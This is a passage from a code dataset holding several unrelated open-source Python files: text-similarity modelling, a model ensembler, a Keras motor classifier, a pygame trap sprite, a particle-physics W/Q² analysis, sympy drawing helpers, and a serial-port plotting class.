model_name=\"lsi\"))\n\n print(f\"2 - building list of doc2vec TaggedDocuments\")\n tagged_documents = list(book_corpus_reader(discipline))\n\n print(f\"3 - train Doc2Vec model\")\n model_d2v = gensim.models.doc2vec.Doc2Vec(vector_size=50, min_count=2, epochs=40)\n model_d2v.build_vocab(tagged_documents)\n model_d2v.train(\n tagged_documents, total_examples=model_d2v.corpus_count, epochs=model_d2v.epochs\n )\n\n print(f\"3 - frequency distribution of words\")\n w2c = {}\n for item in model_d2v.wv.index_to_key:\n if item not in nlp.Defaults.stop_words:\n w2c[item] = model_d2v.wv.get_vecattr(item, \"count\")\n\n print(f\"4 - build documents list for Lsi\")\n texts = [\n [\n word\n for word in document.lower().split()\n if word not in nlp.Defaults.stop_words and w2c.get(word, 0) > 1\n ]\n for document in documents\n ]\n dictionary = gensim.corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n tfidf = gensim.models.TfidfModel(corpus)\n corpus_tfidf=tfidf[corpus]\n\n print(\n \"5 - train lsi model with {len(documents)} documents and {len(w2c)} unique content words\"\n )\n model_lsi = gensim.models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=200)\n\n models_dict = {\n \"Doc2Vec\": {\"model\": model_d2v, \"tagged_documents\": tagged_documents},\n \"Lsi\": {\n \"model\": model_lsi,\n \"dictionary\": dictionary,\n \"corpus\": corpus_tfidf,\n \"documents\": documents,\n },\n }\n\n fp = os.path.join(\n BASE_DIR, \"tmp\", output_dir_name, discipline, population, \"models_dict.pkl\"\n )\n with open(fp, \"wb\") as f:\n pickle.dump(models_dict, f)\n return models_dict\n\n\ndef get_reference_texts(topic, discipline, models_dict):\n \"\"\"\n Arguments:\n ----------\n - topic (question title) -> str\n - discipline -> str\n - models_dict -> dict with keys \"Lsi\" and \"Doc2Vec\"\n e.g. models_dict = build_similarity_models(discipline)\n\n\n Returns:\n --------\n - similar_reference_texts -> dict of lists of reference passages from OpenStax text that are deemed similar to\n topic prompt+expert_rationale+image_alt_text, using Lsi and Doc2Vec models\n \"\"\"\n df_q = get_questions_df(discipline=discipline)\n if discipline in [\"Physics\", \"Chemistry\"]:\n df_q[\"text_all\"] = df_q[[\"text\", \"expert_rationale\", \"image_alt_text\"]].apply(\n lambda x: f\"{x['text']}. {x['expert_rationale']}. {x['image_alt_text']}\", axis=1\n )\n else:\n df_q[\"text_all\"] = df_q[[\"text\", \"expert_rationale\"]].apply(\n lambda x: f\"{x['text']}. 
{x['expert_rationale']}.\", axis=1\n )\n q = df_q[df_q[\"title\"] == topic][\"text_all\"].iat[0]\n\n q_tokens = [token.text for token in nlp(q) if token.is_alpha and not token.is_punct]\n\n similar_reference_texts = {}\n\n # most similar docs : LSI\n model_key = \"Lsi\"\n vec_bow = models_dict[model_key][\"dictionary\"].doc2bow(q_tokens)\n vec_lsi = models_dict[model_key][\"model\"][vec_bow]\n corpus = models_dict[model_key][\"corpus\"]\n index = gensim.similarities.MatrixSimilarity(\n models_dict[model_key][\"model\"][corpus]\n )\n sims = index[vec_lsi]\n\n sims = index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n\n similar_reference_texts[model_key] = []\n for doc_position, doc_score in sims[0:N_DOCS]:\n # if doc_score >= MIN_SIM_SCORE:\n similar_reference_texts[model_key].append(\n models_dict[model_key][\"documents\"][doc_position]\n )\n\n # most similar docs : Doc2Vec\n model_key = \"Doc2Vec\"\n\n model_d2v = models_dict[model_key][\"model\"]\n model_d2v_tagged_docs = models_dict[model_key][\"tagged_documents\"]\n inferred_vector = model_d2v.infer_vector(q_tokens)\n sims = model_d2v.dv.most_similar([inferred_vector], topn=len(model_d2v.dv))\n # sims = [s for s in sims if s[1] >= MIN_SIM_SCORE]\n\n similar_reference_texts[model_key] = [\n {\n \"name\": s[0],\n \"text\": \" \".join(\n [x[0] for x in model_d2v_tagged_docs if x[1][0] == s[0]][0]\n ),\n }\n for s in sims[0:N_DOCS]\n ]\n\n return similar_reference_texts\n","repo_name":"sameerbhatnagar/convincingness","sub_path":"code/feature_extraction_reference_texts.py","file_name":"feature_extraction_reference_texts.py","file_ext":"py","file_size_in_byte":10037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10726106816","text":"import pandas as pd\nfrom collections import OrderedDict\nimport logging\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom os.path import join\nimport pickle\n\n__author__ = \"Matthew Dirks\"\n\nrmse = lambda arr1, arr2: np.sqrt(mean_squared_error(arr1, arr2))\n\ndef flatten(l):\n\t\"\"\" Takes a list of lists and returns a single list containing all the elements.\n\te.g. [[1,2],[3,4]] becomes [1,2,3,4]\n\t\"\"\"\n\tflat_list = [item for sublist in l for item in sublist]\n\treturn flat_list\n\nclass Ensembler:\n\tdef __init__(self):\n\t\tself.metadata_of_models = OrderedDict()\n\n\tdef record_metadata_for_run(self, ith_run, run_result):\n\t\tself.metadata_of_models[ith_run] = run_result\n\n\tdef get_epochs(self):\n\t\t\"\"\" This info used to plot events on loss history plot \"\"\"\n\t\treturn [model_metadata['epoch'] for model_metadata in self.metadata_of_models.values()]\n\n\tdef make_final(self, target_columns_in_use):\n\t\t\"\"\" compute mean predictions for each instance from the collection (ensemble)\n\t\tof models' predictions. And return data for saving and plotting. \"\"\"\n\t\tlogger = logging.getLogger('spectra_ml')\n\n\t\tn_runs = len(self.metadata_of_models)\n\n\t\tlogger.info(f'Ensembler collected {n_runs} models. Computing the ensemble now...')\n\n\t\t# collect ensemble data\n\t\tif (n_runs == 0):\n\t\t\t# no models were saved! This is bad.\n\t\t\traise(Exception('Ensembler has 0 models to work with. Cannot proceed.'))\n\n\t\t# every run picks a random dev set. 
Will combine train and dev together\n\t\tsets_to_evaluate = ['test','test_CV','train','dev']\n\t\tfirst_predictions_dict = self.metadata_of_models[0]['predictions_dict']\n\t\tassert all([which_set in first_predictions_dict.keys() for which_set in sets_to_evaluate])\n\n\t\t# get data from first run...\n\t\t# (and combine across sets)\n\t\t# (just the 'set' and target columns)\n\t\tdf = pd.concat([first_predictions_dict[which_set] for which_set in sets_to_evaluate], axis=0)[['set']+target_columns_in_use]\n\t\tassert df.index.name == 'sampleId'\n\n\t\t# rename \"train\" and \"dev\" to \"train_or_dev\"\n\t\tdf.loc[df['set'].isin(['train', 'dev']), 'set'] = 'train_or_dev'\n\n\t\t# then get the predictions from each run\n\t\tfor run_idx, metadata in self.metadata_of_models.items():\n\t\t\t# combine data across sets\n\t\t\tdf2 = pd.concat([metadata['predictions_dict'][which_set] for which_set in sets_to_evaluate], axis=0)\n\n\t\t\t# rename \"train\" and \"dev\" to \"train_or_dev\"\n\t\t\tdf2.loc[df2['set'].isin(['train', 'dev']), 'set'] = 'train_or_dev'\n\n\t\t\t# sanity check: making sure the data joins properly\n\t\t\tassert (df[['set']+target_columns_in_use].sort_index() == df2[['set']+target_columns_in_use].sort_index()).all().all()\n\n\t\t\t# add the run_idx to the column name (existing column name is in \"TARGET_pred\" format)\n\t\t\told_column_names = [f'{target}_pred' for target in target_columns_in_use]\n\t\t\tnew_column_names = [f'run{run_idx}:{target}_pred' for target in target_columns_in_use]\n\t\t\tdf2.rename(columns=dict(zip(old_column_names, new_column_names)), inplace=True)\n\n\t\t\t# add columns to existing df\n\t\t\tdf = df.join(df2[new_column_names])\n\n\t\t# calculate ensemble's predictions (the average) and other stats for each target\n\t\tstats_df = df[['set']+target_columns_in_use].copy()\n\t\tfor target in target_columns_in_use:\n\t\t\t# get predictions for target\n\t\t\tper_run_pred_columns = [f'run{run_idx}:{target}_pred' for run_idx in self.metadata_of_models.keys()]\n\t\t\tpredictions = df[per_run_pred_columns]\n\n\t\t\t# calc stats\n\t\t\tstats_df[f'{target}_pred'] = predictions.mean(axis=1)\n\t\t\tstats_df[f'{target}_min'] = predictions.min(axis=1)\n\t\t\tstats_df[f'{target}_max'] = predictions.max(axis=1)\n\t\t\tstats_df[f'{target}_std'] = predictions.std(axis=1)\n\n\t\tto_save = {\n\t\t\t'df': stats_df,\n\t\t\t'target_columns': target_columns_in_use,\n\n\t\t\t# NOTE: plotting functions hardcoded to use f'{target}_pred' format. 
If you change it here, plotting functions will need to change too\n\t\t\t'prediction_columns': [f'{target}_pred' for target in target_columns_in_use],\n\n\t\t\t# also save individual predictions from each model of the ensemble - for easy post-analysis\n\t\t\t'ensemble_runs_df': df,\n\t\t}\n\n\t\treturn to_save\n\n\n\tdef get_ensemble_RMSE(self, _set, target):\n\t\t\"\"\" Get the ensemble's score for _set and target\n\t\t(the ensemble is built using training runs completed thus far)\n\t\t\"\"\"\n\n\t\t# get predictions\n\t\tdf = self.make_final([target])['df']\n\n\t\t# calc prediction accuracy\n\t\tset_df = df[df['set']==_set]\n\t\tRMSE = rmse(set_df[target], set_df[f'{target}_pred'])\n\n\t\treturn RMSE\n\n\tdef trigger_short_circuit(self, ensemble_short_circuit):\n\t\t\"\"\" Short-circuit training based on criteria supplied, if any.\n\t\t\n\t\tReturns:\n\t\t\tTrue if training should abort.\n\t\t\"\"\"\n\t\tif (ensemble_short_circuit is not None):\n\t\t\tlogger = logging.getLogger('spectra_ml')\n\n\t\t\tn_runs_completed = len(self.metadata_of_models)\n\n\t\t\tfor settings_dict in ensemble_short_circuit:\n\t\t\t\t# e.g. settings_dict may be {'at_n_runs': 10, 'RMSE_needed': 0.8, 'target': 'DM', 'set': 'dev'}\n\n\t\t\t\t# Check if required number of runs have completed at this point\n\t\t\t\tif (settings_dict['at_n_runs'] == n_runs_completed):\n\t\t\t\t\tlogger.debug(f'DEBUG INFO FOR SHORT CIRCUIT: at_n_runs = n_runs_completed = {n_runs_completed}')\n\n\t\t\t\t\t# Check if current ensemble RMSE meets requirement\n\t\t\t\t\tRMSE = self.get_ensemble_RMSE(settings_dict['set'], settings_dict['target'])\n\t\t\t\t\tlogger.debug(f'DEBUG INFO FOR SHORT CIRCUIT: RMSE={RMSE}, RMSE_needed={settings_dict[\"RMSE_needed\"]}')\n\t\t\t\t\tif (RMSE > settings_dict['RMSE_needed']):\n\t\t\t\t\t\t# requirement not satisfied - abort\n\t\t\t\t\t\treturn True\n\n\n\t\treturn False\n","repo_name":"skylogic004/spectroscopy-neural-network-2","sub_path":"spectra_ml/components/ensembling.py","file_name":"ensembling.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185264874","text":"import matplotlib.pyplot as plt\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom keras.utils import np_utils\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.optimizers import Adagrad\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nfrom tensorflow.keras.optimizers import Adadelta\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom keras.regularizers import l2\r\nimport time\r\n\r\n\r\ndef custom_activation(x):\r\n return x\r\n\r\n\"\"\"Function scale uses the methods of normalization,centering and standardization to reduce big differences between values of the same feature\"\"\"\r\ndef scale(data_input,mode=\"Normalize\"):\r\n cols = len(data_input[0,:])\r\n data_input = np.float64(data_input)\r\n if mode == \"Normalize\":\r\n for i in range(cols):\r\n m = max(data_input[:,i])\r\n if m != 0: data_input[:,i] = np.divide(data_input[:,i],m)\r\n elif mode == \"Standardize\":\r\n for i in range(cols):\r\n if data_input[:, i].std() != 0:\r\n data_input[:, i] = np.divide(np.subtract(data_input[:, i], data_input[:, i].mean()),data_input[:, i].std())\r\n else:\r\n 
data_input[:, i] = np.subtract(data_input[:, i], data_input[:, i].mean())\r\n    elif mode == \"Centering\":\r\n        for i in range(cols):\r\n            data_input[:, i] = np.subtract(data_input[:, i], data_input[:, i].mean())\r\n    else:\r\n        print(\"The mode you have entered is invalid. Try using 'Normalize' or 'Standardize' or 'Centering'\")\r\n        exit(1)\r\n    return data_input\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(9, input_dim=5, activation=custom_activation)) #,kernel_regularizer=l2(L2)\r\nmodel.add(Dense(4, activation=custom_activation)) #,kernel_regularizer=l2(L2)\r\nmodel.add(Dense(3, activation='softmax'))\r\noptimizer = Adagrad(learning_rate=0.1) #,momentum=momentum\r\n\"\"\"model.compile below uses the CE (categorical cross-entropy) loss function\"\"\"\r\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n\r\n\"\"\"end\"\"\"\r\nstart = time.time() #begin timer\r\n\r\n\"\"\"Pre-processing\"\"\"\r\ntrainDF = pd.read_csv(\"NoAccelNoCurrentAll.csv\")\r\ntestDF = pd.read_csv(\"NoAccelNoCurrentTestAll.csv\")\r\n\r\ntrain_input = trainDF.iloc[:,1:].values\r\ntrain_output = trainDF.iloc[:,0].values\r\ntest_input = testDF.iloc[:,1:].values\r\ntest_output = testDF.iloc[:,0].values\r\n\r\nprint(\"oxi\")\r\ntrain_input = scale(train_input,'Standardize')\r\ntest_input = scale(test_input,'Standardize')\r\n\r\n\r\ntrainEN = np_utils.to_categorical(train_output).astype(float) #Encode training output to vectors of 0 and 1\r\ntestEN = np_utils.to_categorical(test_output).astype(float) #Encode testing output to vectors of 0 and 1\r\n\r\n\r\n\r\n\"\"\"end of pre-processing\"\"\"\r\n\r\n\"\"\"Creating our architecture\"\"\"\r\n\r\n\r\nANN_model = model.fit(train_input, trainEN, epochs=25, batch_size=75, verbose=0)\r\n\r\n\r\nend = time.time()\r\n\r\nweight = model.get_weights()\r\nnp.savetxt('weight.csv', weight, fmt='%s', delimiter=',')\r\n\r\n\"\"\"End of model\"\"\"\r\n\r\n\"\"\"Plot accuracy - loss\"\"\"\r\nhistory = ANN_model.history\r\n\r\nplt.plot(history['accuracy'])\r\nplt.plot(history['loss'])\r\nplt.title('My model')\r\nplt.ylabel('Accuracy - Loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['accuracy', 'loss'], loc='upper left')\r\n\r\nmy_path = os.path.dirname(os.path.abspath(__file__))\r\nplt.savefig(my_path + '\\\Results\\\TestSet18\\\epochs25batch75\\\Graph12.png')\r\nplt.show()\r\n\"\"\"End of plotting\"\"\"\r\n\r\n\"\"\"Evaluate model in a completely new dataset\"\"\"\r\n\r\nAccuracy = history['accuracy'][-1]\r\n\r\nPrediction_Test = model.predict(test_input)\r\nright = 0\r\nfor i in range(len(Prediction_Test)):\r\n    temp = 0\r\n    counter = 0\r\n    for j in Prediction_Test[i]:\r\n        if j > temp:\r\n            temp = j\r\n            prediction = counter\r\n        counter += 1\r\n    if test_output[i] == prediction:\r\n        right += 1\r\n\r\nAccuracy_Test = right / len(Prediction_Test)\r\n\r\n\r\n\"\"\"End of Evaluation\"\"\"\r\n\r\n\"\"\"Print results for training accuracy and hyperparameters used. 
Also display the timer.\"\"\"\r\n\r\nprint(\"Accuracy of train set is %.2f\"%(Accuracy*100) , \"%\" )\r\n\r\nprint(\"Accuracy of test set is %.2f\"%(Accuracy_Test*100) , \"%\" )\r\n\r\nprint(\"Total time estimated: {0}\".format(end-start))\r\n\r\n\r\n\r\n\"\"\"End\"\"\"\r\n\r\n","repo_name":"JohnVasilakopoulos/Digital-Twin-Stepper-Motor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5285794486","text":"import pygame\n\nfrom auxiliar import Auxiliar\n\ndef landed(self):\n    self.fall_count =0\n    self.y_vel = 0\n    self.jump_count = 0\n    \ndef hit_head(self):\n    self.count = 0\n    self.y_vel *= -1\n\ndef handle_vertical_collision(player,objects,dy):\n    collided_objects = []\n    for obj in objects:\n        if pygame.sprite.collide_mask(player,obj):\n            if dy > 0:\n                player.rect.bottom = obj.rect.top\n                player.landed()\n            elif dy < 0 :\n                player.rect.top = obj.rect.bottom\n                player.hit_head()\n\n            collided_objects.append(obj)\n\n    return collided_objects\n\n\nclass Object(pygame.sprite.Sprite):\n    def __init__(self,x,y,w,h,name=None):\n        super().__init__()\n        self.rect = pygame.Rect(x,y,w,h)\n        self.image = pygame.Surface((w,h),pygame.SRCALPHA)\n        self.width = w\n        self.height = h\n        self.name = name\n\n# ----------------------  ---------------------------\n# class for applying traps\nclass Fire(Object):\n    ANIMATION_DELAY = 3\n\n    def __init__(self, x, y, width, height):\n        super().__init__(x, y, width, height, \"fire\")\n        self.fire = Auxiliar.getSurfaceFromSeparateFiles(\"images/caracters/enemies/ork_sword/IDLE/trap_1 (4).png\", 1, 8, step=1,scale=2.5, w=width, h=height)\n        self.image = self.fire[0]\n        self.mask = pygame.mask.from_surface(self.image)\n        self.animation_count = 0\n        self.animation_name = \"off\"\n    def check_colision(self, jugador):\n        if self.rect.colliderect(jugador.rect):  # Check collision between rectangles\n            if pygame.sprite.collide_mask(self, jugador):  # Check precise collision with masks\n                # Collision detected between the enemy and the player\n                # Perform additional actions as needed\n                print(\"¡Colisión detectada!\")\n                # Example: reduce the player's lives\n                jugador.lives -= 1\n        \n\n\n    def on(self):\n        self.animation_name = \"on\"\n\n    def off(self):\n        self.animation_name = \"off\"\n\n    def loop(self):\n        self.animation_count += 1\n\n        self.rect = self.image.get_rect(topleft=(self.rect.x, self.rect.y))\n        self.mask = pygame.mask.from_surface(self.image)\n\n        if self.animation_count // self.ANIMATION_DELAY > len(self.fire) - 1:\n            self.animation_count = 0\n    \n    def draw(self, surface):\n        sprites = self.fire\n        sprite_index = (self.animation_count // self.ANIMATION_DELAY) % len(sprites)\n        self.image = sprites[sprite_index]\n\n        surface.blit(self.image, self.rect)\n\n","repo_name":"Mariano-Pozo/pozoMariano-pygame-tp-final","sub_path":"trap.py","file_name":"trap.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14074000277","text":"#!/usr/bin/env python\n# %%\nfrom __future__ import print_function\n\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\nfrom hipopy import LorentzVector, hipo_reader\n\nSECTORS = 7\nBEAM_E = 2.2\nMASS_ELEC = 0.000511\n\n\ndef GetSector(pindex, sector):\n    sec = defaultdict(list)\n    for i in xrange(len(pindex)):\n        
sec[pindex[i]].append(sector[i])\n try:\n return sec[0][0]\n except:\n return 0\n\n\ndef gaus(x, a, x0, sigma):\n return a * np.exp(-(x - x0)**2 / (2 * sigma**2))\n\n\ndef Q2_calc(_e_mu, _e_mu_prime):\n \"\"\"Retruns Q^2 value: q^mu^2 = (e^mu - e^mu')^2 = -Q^2.\"\"\"\n _q_mu = (_e_mu - _e_mu_prime)\n return -_q_mu.Mag2\n\n\ndef W_calc(_e_mu, _e_mu_prime):\n \"\"\"Returns W: Gotten from s channel [(gamma - P)^2 == s == w^2], Sqrt[M_p^2 - Q^2 + 2 M_p gamma].\"\"\"\n _q_mu = (_e_mu - _e_mu_prime)\n _p_target = LorentzVector(0.0, 0.0, 0.0, mass=0.93827)\n return (_p_target + _q_mu).Mag\n\n\ndef process(filenames):\n events = 0\n num = 0\n e_mu = LorentzVector(0.0, 0.0, BEAM_E, energy=BEAM_E)\n for f in filenames:\n reader = hipo_reader(f)\n while reader.next():\n events += 1\n\n print(\"Processing {} Events\".format(events))\n W = np.ones(shape=(SECTORS, events * 2)) * np.nan\n Q2 = np.ones(shape=(SECTORS, events * 2)) * np.nan\n\n for f in filenames:\n reader = hipo_reader(f)\n pid = reader.getIntNode(u\"REC::Particle\", u\"pid\")\n px = reader.getFloatNode(u\"REC::Particle\", u\"px\")\n py = reader.getFloatNode(u\"REC::Particle\", u\"py\")\n pz = reader.getFloatNode(u\"REC::Particle\", u\"pz\")\n vx = reader.getFloatNode(u\"REC::Particle\", u\"vx\")\n vy = reader.getFloatNode(u\"REC::Particle\", u\"vy\")\n vz = reader.getFloatNode(u\"REC::Particle\", u\"vz\")\n charge = reader.getInt8Node(u\"REC::Particle\", u\"charge\")\n beta = reader.getFloatNode(u\"REC::Particle\", u\"beta\")\n\n track_pindex = reader.getInt16Node(u\"REC::Track\", u\"pindex\")\n track_sector = reader.getInt8Node(u\"REC::Track\", u\"sector\")\n\n cal_pindex = reader.getInt16Node(u\"REC::Calorimeter\", u\"pindex\")\n cal_sector = reader.getInt8Node(u\"REC::Calorimeter\", u\"sector\")\n\n while reader.next():\n if len(pid) == 0:\n continue\n num += 1\n sec = GetSector(track_pindex, track_sector)\n e_mu_prime = LorentzVector(px[0], py[0], pz[0], mass=MASS_ELEC)\n W[sec][num] = W_calc(e_mu, e_mu_prime)\n Q2[sec][num] = Q2_calc(e_mu, e_mu_prime)\n\n return events, W, Q2\n\n\n# %%\nstart = time.time()\nevents, W, Q2 = process(sys.argv[1:])\nend = time.time()\nprint((end - start), \"Sec\")\nprint(((end - start) / events), \"time/event\")\nprint((events / (end - start)), \"Hz\")\n\n# %%\nfig_WQ2, axs_WQ2 = plt.subplots(2, 6, sharey='row', figsize=(16, 10))\nfor s in range(1, SECTORS):\n i = s - 1\n W_s = W[s]\n Q2_s = Q2[s]\n W_s = W_s[~np.isnan(W_s)]\n Q2_s = Q2_s[~np.isnan(Q2_s)]\n h, b, _ = axs_WQ2[0, i].hist(W_s, bins=500, range=(0.0, 2.2), color='darkblue',\n histtype='step', fill=True)\n\n y, bins = np.histogram(W_s, range=(0.8, 1.1), bins=500)\n x = (bins[:-1] + bins[1:]) / 2\n popt, pcov = curve_fit(gaus, x, y, p0=[1.0, 1.0, 1.0], maxfev=8000)\n popt[0] = max(h)\n axs_WQ2[0, i].plot(x, gaus(x, *popt), \"red\",\n label=\"$\\mu$ = {0:.4f}\\n$\\sigma$ = {1:.4f}\".format(popt[1], popt[2]), linewidth=2)\n axs_WQ2[0, i].legend()\n\n axs_WQ2[1, i].hist2d(W_s, Q2_s, bins=500, range=((0.0, 2.2), (0, 1.0)))\n axs_WQ2[0, i].set_title(\"Sector {0:d} W vs $Q^2$\".format(s))\n\n# %%\nfig_WQ22, axs_WQ22 = plt.subplots(2, sharex='col', figsize=(16, 10))\nW_s = W[:]\nQ2_s = Q2[:]\nW_s = W_s[~np.isnan(W_s)]\nQ2_s = Q2_s[~np.isnan(Q2_s)]\nh, b, _ = axs_WQ22[0].hist(W_s, bins=500, range=(0.0, 2.2), color='darkblue',\n histtype='step', fill=True)\ny, bins = np.histogram(W_s, range=(0.8, 1.1), bins=500, density=True)\nx = (bins[:-1] + bins[1:]) / 2\npopt, pcov = curve_fit(gaus, x, y, p0=[1.0, 1.0, 1.0])\npopt[0] = max(h)\naxs_WQ22[0].plot(x, 
gaus(x, *popt), \"red\",\n label=\"$\\mu$ = {0:.4f}\\n$\\sigma$ = {1:.4f}\".format(popt[1], popt[2]), linewidth=2)\naxs_WQ22[0].legend()\n\naxs_WQ22[1].hist2d(W_s, Q2_s, bins=500, range=((0.0, 2.2), (0, 1.0)))\naxs_WQ22[0].set_title(\"All Sectors W vs $Q^2$\".format(s))\n\nfig_WQ2.savefig(\"WvsQ2_bySector.pdf\")\nfig_WQ22.savefig(\"WvsQ2.pdf\")\n","repo_name":"tylern4/hipopy","sub_path":"examples/inclusive.py","file_name":"inclusive.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69810825708","text":"from __future__ import absolute_import\nfrom numpy import arange\nimport sympy as sym\nfrom sympy import geometry as geo\n\ndef add_geometry(drawing, g, move_to=False, step=1):\n ''' draw sympy equations '''\n if isinstance(g, geo.Ellipse):\n drawing.ellipse(g.center.x, g.center.y, g.hradius, g.vradius)\n elif hasattr(g, 'vertices'):\n try:\n if move_to:\n drawing.move_to(g.vertices[0].x, g.vertices[0].y)\n else:\n drawing.line_to(g.vertices[0].x, g.vertices[0].y)\n for vertex in g.vertices[1:]:\n drawing.line_to(vertex.x, vertex.y)\n except AttributeError:\n if move_to:\n drawing.move_to(g.vertices[0][0], g.vertices[0][1])\n else:\n drawing.line_to(g.vertices[0][0], g.vertices[0][1])\n for vertex in g.vertices[1:]:\n drawing.line_to(vertex[0], vertex[1])\n elif hasattr(g, 'points'):\n if move_to:\n drawing.move_to(g.points[0].x, g.points[0].y)\n else:\n drawing.line_to(g.points[0].x, g.points[0].y)\n for point in g.points[1:]:\n drawing.line_to(point.x, point.y)\n elif hasattr(g, 'x') and hasattr(g, 'y'):\n if move_to:\n drawing.move_to(g.x, g.y)\n else:\n drawing.line_to(g.x, g.y)\n elif hasattr(g, 'p1') and hasattr(g, 'p2'):\n if move_to:\n drawing.move_to(g.p1.x, g.py.y)\n else:\n drawing.line_to(g.p1.x, g.p1.y)\n elif hasattr(g, 'functions'):\n has_tried_move = not move_to\n for x_pos in arange(g.limits[1], g.limits[2]+1, step):\n if not has_tried_move:\n has_tried_move = True\n if move_to:\n drawing.move_to(g.functions[0].subs(g.limits[0], x_pos),\n g.functions[1].subs(g.limits[0], x_pos))\n continue\n drawing.line_to(g.functions[0].subs(g.limits[0], x_pos),\n g.functions[1].subs(g.limits[0], x_pos))\n\n","repo_name":"zshipko/libtwombly","sub_path":"py/twombly/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"41631656765","text":"import serial\nimport serial.tools.list_ports\nimport copy\n\nimport numpy as np\nimport math\nimport random\n\n\nclass AsciiSerial:\n def __init__(self):\n self._graphsChannels = {'graph1': None, 'graph2': None, 'graph3': None, 'graph4': None}\n self._enChannels = {'graph1': False, 'graph2': False, 'graph3': False, 'graph4': False}\n\n # Structure definition:\n # {'ChannelName': channelData('display', {'lineName': [lowLevelID, xFieldID, yFieldID(optional)], ... }), ... 
}\n self._channelsDataStructure = {\n 'POSITION': channelData('line-scatter', {'p': [0, 0, 1]}),\n 'TRAJECTORY': channelData('line-scatter', {'t': [1, 0, 1]}),\n 'PID_V_G': channelData('line', {'setPoint': [2, 0], 'value': [2, 1], 'output': [2, 2]}),\n 'PID_V_D': channelData('line', {'setPoint': [3, 0], 'value': [3, 1], 'output': [3, 2]}),\n 'PID_TRANS': channelData('line', {'setPoint': [4, 0], 'value': [4, 1], 'output': [4, 2]}),\n 'BLOCKING_M_G': channelData('line', {'aimSpeed': [5, 0], 'realSpeed': [5, 1], 'isBlocked': [5, 2]}),\n 'BLOCKING_M_D': channelData('line', {'aimSpeed': [6, 0], 'realSpeed': [6, 1], 'isBlocked': [6, 2]}),\n 'STOPPING_MGR': channelData('line', {'speed': [7, 0], 'isStopped': [7, 1]}),\n 'DIRECTION': channelData('line', {'aimDirection': [8, 0], 'realDirection': [8, 1]}),\n 'SENSORS': channelData('scatter', {'sensorTest': [9, 0, 1]}),\n 'PID_TRAJ': channelData('scatter', {'p': [0, 0, 1], 't': [1, 0, 1]}),\n 'TRAJ_ERRORS': channelData('line', {'t': [10, 0], 'c': [10, 1], 'ac': [10, 2], 'ang': [10, 3], 'pos': [10, 4]}),\n 'AX12_G': channelData('line', {'aim': [8, 4], 'real': [8, 2]}),\n 'AX12_D': channelData('line', {'aim': [8, 5], 'real': [8, 3]})\n }\n\n self._shapeInitData = {\n 'line': [],\n 'line-scatter': [[], []],\n 'scatter': [[], []]\n }\n\n self.linesToSend = []\n self.receivedLines_main = []\n self.receivedLines_warning = []\n self.receivedLines_error = []\n\n self.serial = serial.Serial()\n self.incomingLine = \"\"\n\n # Format des données :\n # {'graphN': {'data': {'lineName': lineData, ...}, 'shape': String}\n #\n # 'shape' peut être :\n # \"line\" : ligne continue reliant chaque point\n # \"scatter\": nuage de points (x,y) indépendants\n # \"line-scatter: nuage de points (x,y) reliés entre eux\n #\n # Pour chaque 'shape', 'lineData' a une forme différente :\n # \"line\" : tableau à 1 dimension représentant les coordonnées y de chaque point\n # \"scatter\": tableau t à 2 dimensions. t[0] est un tableau représentant x pour chaque point. 
t[1] représente y\n # \"line-scatter\": idem que 'scatter'\n\n self.graphData = {'graph1': {'data': None, 'shape': None},\n 'graph2': {'data': None, 'shape': None},\n 'graph3': {'data': None, 'shape': None},\n 'graph4': {'data': None, 'shape': None}}\n\n self.phase = np.linspace(0, 10 * np.pi, 100)\n self.index = 0\n\n @staticmethod\n def scanPorts():\n return list(serial.tools.list_ports.comports())\n\n def open(self, port):\n self.serial.port = port.split(\" \")[0]\n self.serial.open()\n\n def close(self):\n self.serial.close()\n\n def getChannelsList(self):\n channelsList = []\n for key in self._channelsDataStructure:\n channelsList.append(key)\n channelsList.sort()\n return channelsList\n\n def getChannelsFromID(self, identifier):\n channels = set()\n for channel, cData in self._channelsDataStructure.items():\n lines = cData.lineNames\n for lineName, lineIds in lines.items():\n if lineIds[0] == identifier:\n channels.add(channel)\n return channels\n\n def getIDsFromChannel(self, channel):\n ids = set()\n lines = self._channelsDataStructure[channel].lineNames\n for lineName, lineIds in lines.items():\n ids.add(lineIds[0])\n return ids\n\n def communicate(self):\n if self.serial.is_open:\n for line in self.linesToSend:\n self.serial.write(line.encode('ascii'))\n self.linesToSend.clear()\n\n nbB = self.serial.in_waiting\n if nbB > 0:\n self.incomingLine += self.serial.read(nbB).decode(encoding='utf-8', errors='ignore')\n\n newLineIndex = self.incomingLine.find('\\n')\n while newLineIndex != -1:\n self.addLineToProperList(self.incomingLine[0:newLineIndex+1])\n self.incomingLine = self.incomingLine[newLineIndex+1:]\n 